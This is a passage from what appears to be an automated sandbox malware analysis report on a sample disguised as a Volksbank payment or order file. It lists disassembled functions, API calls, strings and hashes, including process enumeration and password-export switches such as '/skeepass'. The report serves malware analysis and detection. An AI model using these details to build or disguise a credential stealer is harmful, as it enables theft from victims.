                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                                          • String ID: ---
                                                                                                                                                                                                                                          • API String ID: 3437578500-2854292027
                                                                                                                                                                                                                                          • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                                                                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                                                          Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1010922700-0
                                                                                                                                                                                                                                          • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                                                                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                                                          Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                          • free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                                                          • free.MSVCRT ref: 004186E0
                                                                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                                                          • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00418716
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0041872A
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00418749
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                                                                                          • String ID: |A
                                                                                                                                                                                                                                          • API String ID: 3356672799-1717621600
                                                                                                                                                                                                                                          • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                                                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                                                          Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                                          • API String ID: 2081463915-1959339147
                                                                                                                                                                                                                                          • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                                                                                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                                                          Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                          • API String ID: 2012295524-70141382
                                                                                                                                                                                                                                          • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                                                                                                                                          Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 667068680-3953557276
                                                                                                                                                                                                                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                                                                                                                                          Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1700100422-0
                                                                                                                                                                                                                                          • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                                                                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                                                          Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 552707033-0
                                                                                                                                                                                                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                                                          Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                                                          • String ID: 4$h
                                                                                                                                                                                                                                          • API String ID: 4066021378-1856150674
                                                                                                                                                                                                                                          • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                                                                                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                                                          Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                                                                                          • String ID: %%0.%df
                                                                                                                                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                                                                                                                                          • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                                                                                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                                                                                          Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                                                          • String ID: A
                                                                                                                                                                                                                                          • API String ID: 2892645895-3554254475
                                                                                                                                                                                                                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                                                          Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                                                                                            • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                                                                                            • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                                                                                            • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                                                                                          • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                                                                                          • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                                                                                          • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                                                                                          • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                                                                                            • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
